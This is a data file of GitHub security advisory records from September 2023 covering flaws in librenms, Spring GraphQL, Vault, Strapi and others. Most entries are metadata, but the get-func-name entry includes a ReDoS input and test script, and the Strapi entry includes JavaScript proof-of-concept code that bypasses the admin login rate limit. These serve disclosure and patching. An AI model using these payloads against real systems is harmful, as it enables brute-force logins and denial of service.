[{'package': {'ecosystem': 'Packagist', 'name': 'librenms/librenms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '23.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4979'}, {'type': 'WEB', 'url': 'https://github.com/librenms/librenms/commit/49d66fa31b43acef02eaa09ee9af15fe7e16cd03'}, {'type': 'PACKAGE', 'url': 'https://github.com/librenms/librenms'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e67f8f5d-4048-404f-9b86-cb6b8719b77f'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-15T19:30:04Z', 'nvd_published_at': None}
1.4.0
GHSA-frqc-f2h8-fjvf
2023-09-21T16:59:16Z
2023-09-20T12:30:22Z
null
['CVE-2023-34047']
Spring for GraphQL may be exposed to GraphQL context with values from a different session
A batch loader function in Spring for GraphQL versions 1.1.0 - 1.1.5 and 1.2.0 - 1.2.2 may be exposed to GraphQL context with values, including security context values, from a different session. An application is vulnerable if it provides a DataLoaderOptions instance when registering batch loader functions through DefaultBatchLoaderRegistry.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.graphql:spring-graphql'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '1.1.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.graphql:spring-graphql'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.2.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34047'}, {'type': 'PACKAGE', 'url': 'https://github.com/spring-projects/spring-graphql'}, {'type': 'WEB', 'url': 'https://spring.io/security/cve-2023-34047'}]
{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-09-21T16:59:16Z', 'nvd_published_at': None}
1.4.0
GHSA-86c6-3g63-5w64
2023-09-29T20:38:23Z
2023-09-29T00:30:16Z
null
['CVE-2023-5077']
Hashicorp Vault Incorrect Permission Assignment for Critical Resource vulnerability
The Vault and Vault Enterprise ("Vault") Google Cloud secrets engine did not preserve existing Google Cloud IAM Conditions upon creating or updating rolesets. Fixed in Vault 1.13.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-5077'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-30-vault-s-google-cloud-secrets-engine-removed-existing-iam-conditions-when-creating-updating-rolesets/58654'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/vault'}]
{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-29T20:38:23Z', 'nvd_published_at': None}
1.4.0
GHSA-fv2h-753j-9g39
2023-09-20T23:01:52Z
2023-09-20T23:01:52Z
null
['CVE-2023-41890']
Sustainsys.Saml2 Insufficient Identity Provider Issuer Validation
### Impact When a response is processed, the issuer of the Identity Provider is not sufficiently validated. This could allow a malicious identity provider to craft a Saml2 response that is processed as if issued by another identity provider. It is also possible for a malicious end user to cause stored state intended for one identity provider to be used when processing the response from another provider. An application is impacted if they rely on any of these features in their authentication/authorization logic: * the issuer of the generated identity and claims * items in the stored request state (AuthenticationProperties) ### Patches Patched in version 2.9.2 and 1.0.3. All previous versions are vulnerable. ### Workarounds The `AcsCommandResultCreated` notification can be used to add the validation required if an upgrade to patched packages is not possible. ### References The patch is linked to https://github.com/Sustainsys/Saml2/issues/712 and https://github.com/Sustainsys/Saml2/issues/713
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Sustainsys.Saml2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Sustainsys.Saml2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/security/advisories/GHSA-fv2h-753j-9g39'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-41890'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/issues/712'}, {'type': 'WEB', 'url': 'https://github.com/Sustainsys/Saml2/issues/713'}, {'type': 'PACKAGE', 'url': 'https://github.com/Sustainsys/Saml2'}]
{'cwe_ids': ['CWE-289'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-20T23:01:52Z', 'nvd_published_at': None}
1.4.0
GHSA-23px-mw2p-46qm
2023-09-06T20:49:54Z
2023-09-06T20:49:54Z
null
[]
Cosmos-SDK Cosmovisor component may be vulnerable to denial of service
**Component**: Cosmovisor **Criticality**: Medium **Affected Versions**: Cosmovisor < v1.0.0 (distributed with Cosmos-SDK < 0.46) **Affected Users**: Validators and Node operators utilizing unsupported versions of Cosmovisor **Impact**: DOS, potential RCE on node depending on configuration An issue has been identified on unsupported versions of Cosmovisor which may result in a Denial of Service or Remote Code Execution path depending on configuration for a node or validator using the vulnerable version to manage their node. If a validator is utilizing an affected version of Cosmovisor with `DAEMON_ALLOW_DOWNLOAD_BINARIES` set to true, a non-default configuration, it may be possible for an attacker to trigger a Remote Code Execution path as well on the host. In this configuration it is recommended to immediately stop use of the `DAEMON_ALLOW_DOWNLOAD_BINARIES` feature, and then proceed with an upgrade of Cosmovisor. It is recommended that all validators utilizing unsupported versions of Cosmovisor to upgrade to the latest supported versions immediately. If you are utilizing a forked version of Cosmos-SDK, it is recommended to stop use of Cosmovisor until it is possible to update to a supported version of Cosmovisor, whether through your project’s fork, or directly compiled from the Cosmos-SDK. At the time of this advisory, the latest version of Cosmovisor is v1.5.0. Additionally, the Amulet team recommends that developers building chains powered by Cosmos-SDK share this advisory with validators and node operators to ensure this information is available to all impacted parties within their ecosystems. For more information about Cosmovisor, see https://docs.cosmos.network/main/tooling/cosmovisor This issue was discovered by [Maxwell Dulin](https://maxwelldulin.com) and Nathan Kirkland, who reported it to the Cosmos Bug Bounty Program. If you believe you have found a bug in the Interchain Stack or would like to contribute to the program by reporting a bug, please see [https://hackerone.com/cosmos](https://hackerone.com/cosmos). ## How to tell if I am affected? Running the following command will output whether your cosmovisor version is vulnerable to this issue or not. Vulnerable to this issue: ``` strings ./cosmovisor | grep -q "NEEDED at" && echo "vulnerable" || echo "NOT vulnerable" vulnerable ``` NOT vulnerable to this issue: ``` strings ./cosmovisor_new | grep -q "NEEDED at" && echo "vulnerable" || echo "NOT vulnerable" NOT vulnerable ``` ***** A Note from Amulet on the Security Advisory Process In the interest of timely resolution of this issue for validators and node operators, the Amulet team has chosen to use existing processes and resources for distributing security advisories within the Cosmos and Interchain Ecosystems. Stay tuned as we implement an improved, more robust security advisory distribution system that will provide equitable access to information about security issues in the Interchain Stack.
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/cosmos/cosmos-sdk'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.46'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/security/advisories/GHSA-23px-mw2p-46qm'}, {'type': 'PACKAGE', 'url': 'https://github.com/cosmos/cosmos-sdk'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/blob/tools/cosmovisor/v1.5.0/tools/cosmovisor/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/cosmos/cosmos-sdk/releases/tag/v0.46.0'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-09-06T20:49:54Z', 'nvd_published_at': None}
1.4.0
GHSA-2g7r-9xq5-c6hv
2023-09-20T21:29:25Z
2023-09-18T06:30:14Z
null
['CVE-2023-5036']
Cross-Site Request Forgery (CSRF) in usememos/memos
Cross-Site Request Forgery (CSRF) in GitHub repository usememos/memos prior to 0.15.1.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.15.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-5036'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/97b434722cf0abe3cfcad5ac9e3d520233bf1536'}, {'type': 'PACKAGE', 'url': 'https://github.com/usememos/memos'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/46881df7-eb41-4ce2-a78f-82de9bc4fc2d'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-18T19:18:55Z', 'nvd_published_at': None}
1.4.0
GHSA-j7hp-h8jx-5ppr
2023-09-21T17:24:00Z
2023-09-12T15:30:20Z
null
['CVE-2023-4863']
libwebp: OOB write in BuildHuffmanTable
Heap buffer overflow in libwebp allow a remote attacker to perform an out of bounds memory write via a crafted HTML page.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'libwebp-sys2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.8'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'libwebp-sys'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '22.0.0'}, {'fixed': '22.3.24'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '24.0.0'}, {'fixed': '24.8.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '25.0.0'}, {'fixed': '25.8.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '26.0.0'}, {'fixed': '26.2.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'electron'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '27.0.0-beta.1'}, {'fixed': '27.0.0-beta.2'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'SkiaSharp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.88.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/chai2010/webp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4863'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/39823'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/39825'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/39826'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/39827'}, {'type': 'WEB', 'url': 'https://github.com/electron/electron/pull/39828'}, {'type': 'WEB', 'url': 'https://github.com/qnighy/libwebp-sys2-rs/pull/21'}, {'type': 'WEB', 'url': 'https://github.com/qnighy/libwebp-sys2-rs/commit/4560c473a76ec8bd8c650f19ddf9d7a44f719f8b'}, {'type': 'WEB', 'url': 'https://github.com/webmproject/libwebp/commit/902bc9190331343b2017211debcec8d2ab87e17a'}, {'type': 'WEB', 'url': 'https://adamcaudill.com/2023/09/14/whose-cve-is-it-anyway/'}, {'type': 'WEB', 'url': 'https://blog.isosceles.com/the-webp-0day/'}, {'type': 'WEB', 'url': 'https://bugzilla.suse.com/show_bug.cgi?id=1215231'}, {'type': 'WEB', 'url': 'https://chromereleases.googleblog.com/2023/09/stable-channel-update-for-desktop_11.html'}, {'type': 'WEB', 'url': 'https://crbug.com/1479274'}, {'type': 'WEB', 'url': 'https://en.bandisoft.com/honeyview/history/'}, {'type': 'PACKAGE', 'url': 'https://github.com/webmproject/libwebp'}, {'type': 'WEB', 'url': 'https://github.com/webmproject/libwebp/releases/tag/v1.3.2'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/09/msg00015.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/09/msg00016.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T655QF7CQ3DYAMPFV7IECQYGDEUIVVT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYYKLG6CRGEDTNRBSU26EEWAO6D6U645/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUQ7CTX3W372X3UY56VVNAHCH6H2F4X3/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OZDGWWMJREPAGKWCJKSCM4WYLANSKIFX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PYZV7TMKF4QHZ54SFJX54BDN52VHGGCX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WHOLML7N2G5KCAZXFWC5IDFFHSQS5SDB/'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-4863'}, {'type': 'WEB', 'url': 'https://news.ycombinator.com/item?id=37478403'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0060.html'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0061.html'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2023-4863'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202309-05'}, {'type': 'WEB', 'url': 'https://stackdiary.com/critical-vulnerability-in-webp-codec-cve-2023-4863/'}, {'type': 'WEB', 'url': 'https://www.bleepingcomputer.com/news/google/google-fixes-another-chrome-zero-day-bug-exploited-in-attacks/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5496'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5497'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5498'}, {'type': 'WEB', 'url': 'https://www.mozilla.org/en-US/security/advisories/mfsa2023-40/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/21/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/3'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/4'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/5'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/6'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/7'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/22/8'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/26/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/26/7'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/28/1'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/28/2'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/09/28/4'}]
{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-14T16:20:50Z', 'nvd_published_at': None}
1.4.0
GHSA-4q6p-r6v2-jvc5
2023-09-27T20:16:00Z
2023-09-27T20:16:00Z
null
['CVE-2023-43646']
Chaijs/get-func-name vulnerable to ReDoS
The current regex implementation for parsing values in the module is susceptible to excessive backtracking, leading to potential DoS attacks. The regex implementation in question is as follows: ```js const functionNameMatch = /\s*function(?:\s|\s*\/\*[^(?:*/)]+\*\/\s*)*([^\s(/]+)/; ``` This vulnerability can be exploited when there is an imbalance in parentheses, which results in excessive backtracking and subsequently increases the CPU load and processing time significantly. This vulnerability can be triggered using the following input: ```js '\t'.repeat(54773) + '\t/function/i' ``` Here is a simple PoC code to demonstrate the issue: ```js const protocolre = /\sfunction(?:\s|\s/*[^(?:*\/)]+*/\s*)*([^\(\/]+)/; const startTime = Date.now(); const maliciousInput = '\t'.repeat(54773) + '\t/function/i' protocolre.test(maliciousInput); const endTime = Date.now(); console.log("process time: ", endTime - startTime, "ms"); ```
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'get-func-name'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/chaijs/get-func-name/security/advisories/GHSA-4q6p-r6v2-jvc5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-43646'}, {'type': 'WEB', 'url': 'https://github.com/chaijs/get-func-name/commit/f934b228b5e2cb94d6c8576d3aac05493f667c69'}, {'type': 'PACKAGE', 'url': 'https://github.com/chaijs/get-func-name'}, {'type': 'WEB', 'url': 'https://github.com/chaijs/get-func-name/blob/78ad756441a83f3dc203e50f76c113ae3ac017dc/index.js#L15'}]
{'cwe_ids': ['CWE-1333', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-27T20:16:00Z', 'nvd_published_at': None}
1.4.0
GHSA-j2gj-g3p9-7mrr
2023-09-01T21:43:04Z
2023-09-01T03:30:14Z
null
['CVE-2023-4696']
Account TakeOver Due to Improper Handling of JWT Tokens in usememos/memos
Improper Access Control in GitHub repository usememos/memos prior to 0.13.2. As of commit `c9aa2eeb9` access tokens which fail validation are rejected.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-4696'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/c9aa2eeb9852047e4f41915eb30726bd25f07ecd'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/4747a485-77c3-4bb5-aab0-21253ef303ca'}]
{'cwe_ids': ['CWE-284'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-09-01T21:43:04Z', 'nvd_published_at': None}
1.4.0
GHSA-22rr-f3p8-5gf8
2023-09-15T17:12:42Z
2023-09-15T17:12:42Z
null
[]
Directus affected by VM2 sandbox escape vulnerability
### Impact In vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the "Run Script" operation in flows being able to escape the sandbox running code in the main nodejs context. ### Patches Patched in v10.6.0 by replacing `vm2` with `isolated-vm` ### Workarounds None ### References https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'directus'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/pull/19332'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058'}, {'type': 'PACKAGE', 'url': 'https://github.com/directus/directus'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-15T17:12:42Z', 'nvd_published_at': None}
1.4.0
GHSA-24q2-59hm-rh9r
2023-09-13T16:32:26Z
2023-09-13T16:32:26Z
null
['CVE-2023-38507']
Strapi Improper Rate Limiting vulnerability
### 1. Summary There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it. ### 2. Details It is possible to avoid this by modifying the rate-limited request path as follows. 1. Manipulating request paths to upper or lower case. (Pattern 1) - In this case, avoidance is possible with various patterns. 2. Add path slashes to the end of the request path. (Pattern 2) ### 3. PoC Access the administrator's login screen (`/admin/auth/login`) and execute the following PoC on the browser's console screen. #### Pattern 1 (uppercase and lowercase) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/Login", { // capitalize part of path method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 4. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 5. Next, falsify the pathname of the request (**`/admin/Login`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) #### Pattern 2 (trailing slash) ```js // poc.js (async () => { const data1 = { email: "admin@strapi.com", // registered e-mail address password: "invalid_password", }; const data2 = { email: "admin@strapi.com", password: "RyG5z-CE2-]*4e4", // correct password }; for (let i = 0; i < 30; i++) { await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data1), headers: { "Content-Type": "application/json", }, }); } const res1 = await fetch("http://localhost:1337/admin/login", { method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res1.status + " " + res1.statusText); const res2 = await fetch("http://localhost:1337/admin/login/", { // trailing slash method: "POST", body: JSON.stringify(data2), headers: { "Content-Type": "application/json", }, }); console.log(res2.status + " " + res2.statusText); })(); ``` ##### This PoC does the following: 1. Request 30 incorrect logins. 2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (`429 Too Many Requests`) 3. Next, falsify the pathname of the request (**`/admin/login/`**) and make a request again to confirm that it is possible to bypass the rate limit and log in. (`200 OK`) #### PoC Video - [PoC Video](https://drive.google.com/file/d/1UHyt6UDpl28CXjltVJmqDvSEkkJIexiB/view?usp=share_link) ### 4. Impact It is possible to bypass the rate limit of the login function of the admin screen. Therefore, the possibility of unauthorized login by login brute force attack increases. ### 5. Measures Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (`ctx.request.path`) Also, remove any extra slashes in the request path. https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31 ### 6. References - [OWASP: API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/) - [OWASP: Authentication Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html) - [OWASP: Denial of Service Cheat Sheet (Rate limiting)](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': '@strapi/admin'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@strapi/plugin-users-permissions'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.12.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38507'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v4.12.1'}]
{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-09-13T16:32:26Z', 'nvd_published_at': None}